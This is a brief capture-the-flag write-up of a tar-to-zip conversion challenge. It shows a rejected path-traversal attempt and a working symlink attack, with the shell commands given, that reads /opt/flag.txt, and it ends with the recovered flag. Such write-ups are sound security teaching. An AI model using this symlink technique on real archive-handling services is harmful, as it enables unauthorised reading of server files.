Task

I built a fancy shmancy web service that converts .tar archives to .zip!
Did the conversion once manually and then spent hours automating it, you know how it is. Now I just have to use it a few thousand times… But, ergh, you could help me with that.
Disclose the content of /opt/flag.txt!

There was a web site which lets you upload tar archives to convert them into zip archives you can download.

Solution

First I tried to modify the file name inside the tar archive to ../../../../opt/flag.txt and similiar, but the server responded with a sassy message:

I’m starting to think you don’t really know what you’re doing… Hmmm.

So the next thing I tried was a malicious symlink:

sudo touch /opt/flag.txt ln -s /opt/flag.txt evil_symlink
tar -cvf ebin.tar evil_symlink

Now it’s time to upload the tar archive and download the zip archive via the web browser.

unzip upload.zip
cat evil_symlink

After unzipping the archive, the file “evil_symlink” contained the following text:

MRMCD2023{5yml1nk5_3qu4l_d4n63rd4n63r}

Solved by petrosyan